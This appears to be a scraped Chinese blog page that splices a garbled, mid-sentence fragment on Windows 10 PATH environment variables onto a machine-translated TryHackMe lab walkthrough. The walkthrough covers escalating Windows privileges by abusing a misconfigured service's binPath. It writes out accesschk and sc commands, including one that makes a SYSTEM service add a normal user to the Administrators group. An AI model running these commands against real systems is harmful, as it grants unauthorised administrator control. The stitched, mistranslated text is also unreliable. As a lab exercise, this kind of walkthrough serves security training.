前沿拓展:
win10 path默認
%systemroot%\system框,如果當前是以administrator登錄系統(tǒng)的用戶,對話框的上面為administrator的用戶變量,對話框的下面為系統(tǒng)變量(即相當于系統(tǒng)中所有用戶的用戶變量)。有的時候我們會看到在用戶變量和系統(tǒng)探視變量中都存在某一個環(huán)境變量,比如path,那么path的值到底是用戶變量中的值還是系統(tǒng)變量中的值,或者兩者都不是呢?**是兩者都不是。path變量的值是用戶變器量中的值與系統(tǒng)變量中的值的疊加。
4.改變環(huán)境變量和環(huán)境變量中的值應該注意什么?
環(huán)境變量和環(huán)境變量的值不要含有空格,也不要用中文,切記!
使用 binPath 提升 Windows 權限
binPath 是一個必需的服務參數(shù),用于指定服務二進制文件的路徑。如果任何服務配置了不正確的權限并提供對服務配置的未經(jīng)授權的訪問,攻擊者可以利用此錯誤配置并通過binPath參數(shù)執(zhí)行任意命令。
如果服務配置為以提升的權限運行,攻擊者可以在以普通用戶身份登錄時以管理權限執(zhí)行任意命令。
攻擊背后的想法是識別以系統(tǒng)或管理權限運行的服務,并使用錯誤的權限來配置服務并通過binPath參數(shù)執(zhí)行任意命令。
Windows 特權升降架
在演示中,我將使用 TryHackMe 中的一個易受攻擊的機器,名為Windows PrivEsc Arena。
·黑客機器IP – 10.10.249.6
·受害者機器的IP地址是10.10.140.212
·具有權限的用戶 –用戶
初始訪問
因此,我們可以使用普通用戶user的權限進行訪問。我們需要通過將用戶用戶添加到管理員組來提升權限。
具有用戶權限的受害計算機
我們看到只有TCM用戶是 Administrators 組的成員。
管理員組服務
第一步是為服務定義弱權限。我們可以使用Accesschk工具來查找可以修改的服務
accesschk64.exe –wvcu Everyone *
(Shows all the services that has write access to Everyone)
–u = Suppress Errors–w = Show only objects that has write access
–v = Verbose
–c = Name as a windows service ( * for all the services)
Accesschk 的智能
daclsvc服務將SERVICE_CHANGE_CONFIG權限設置為每個人。
我們可以使用以下命令查詢服務以獲取更多信息:
accesschk64.exe –wvcu daclsvc
daclsvc 服務
sc qc daclsvc
daclsvc 服務
在上面的屏幕截圖中,您可以看到daclsvc服務正在以系統(tǒng)權限運行。讓我們嘗試使用錯誤的配置將用戶用戶添加到管理員組。
開發(fā)
使用以下命令更改daclsvc服務的 binPath參數(shù):
sc config daclsvc binPath=“net localgroup administrators user /add”
更改 binPath 參數(shù)
我們看到命令執(zhí)行成功。讓我們檢查binPath參數(shù):
sc qc daclsvc
daclsvc 查詢服務
重新啟動服務后,用戶user將被添加到管理員組中。
服務開始
結論
我向您展示了如何使用 binPath 參數(shù)在 Windows 上提升權限。為了防止攻擊,您必須防止未經(jīng)授權的管理員對服務進行更改。
拓展知識:
原創(chuàng)文章,作者:九賢生活小編,如若轉載,請注明出處:http://m.cxzzxj.cn/123903.html